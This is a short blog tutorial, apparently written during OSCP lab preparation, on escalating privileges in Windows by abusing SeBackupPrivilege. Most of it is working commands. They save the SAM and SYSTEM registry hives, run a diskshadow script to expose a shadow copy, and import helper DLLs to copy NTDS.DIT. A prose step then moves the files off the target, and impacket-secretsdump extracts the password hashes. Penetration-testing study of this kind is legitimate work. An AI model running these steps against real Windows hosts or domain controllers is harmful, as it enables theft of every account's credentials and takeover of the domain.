2 min to read

Windows Privilege Escalation (SeBackupPrivilege)

How SeBackupPrivilege Grants Unlimited "Read" to System Files (like SAM, SYSTEM, and NTDS.DIT).

Featured image

When I was grinding labs to prepare for OSCP, I came across a machine that required me to go through SeBackupPrivilege. However, many tutorials were really complex and lengthy. But there’s simple way to perform privilege escalation with this.

SeBackupPrivilege is a Windows permission that lets you read “any file” on the system, no matter the permissions.

1. Backup SAM, SYSTEM & NTDS.DIT

Backing up SAM & SYSTEM is actually pretty simple. All you need to do is use the reg save command.

reg save HKLM\SAM C:\Windows\temp\SAM.bak

reg save HKLM\SYSTEM C:\Windows\temp\SYSTEM.bak

However, the tricky part is backing up NTDS.DIT, which requires a different set of steps.

To perform the backup, I used the two .DLL files below.

  1. SeBackupPrivilegeCmdLets.dll
  2. SeBackupPrivilegeUtils.dll

Once downloaded, the next step is to copy them to the target machine (I recommend placing them in C:\Windows\temp\).

Next, create a vss.dsh file with the following script:

set context persistent nowriters
set metadata c:\\programdata\\test.cab
set verbose on
add volume c: alias test
create
expose %test% z:

Once created, place this script on the target machine (also) at C:\Windows\temp\.

Then, just execute it using the following commands:

cd "C:\Windows\temp"

import-module .\SeBackupPrivilegeCmdLets.dll

import-module .\SeBackupPrivilegeUtils.dll

diskshadow /s C:\\Windows\\temp\\vss.dsh

Copy-FileSeBackupPrivilege z:\\Windows\\ntds\\ntds.dit C:\\Windows\\temp\\NTDS.DIT.bak

Once done, the next step is to exfiltrate those files (SAM.bak, SYSTEM.bak & NTDS.DIT.bak) to our machine (Kali Linux).

2. Read the Backup Files (via Kali Linux)

Once everything has been successfully transferred to your machine, we can read the files we backed up earlier using Impacket.

impacket-secretsdump -sam SAM.bak -system SYSTEM.bak -ntds NTDS.DIT.bak LOCAL

Conclusion

That’s a quick tutorial on abusing SeBackupPrivilege to gain higher access on a Windows machine. If you need more insights, feel free to leave a comment below.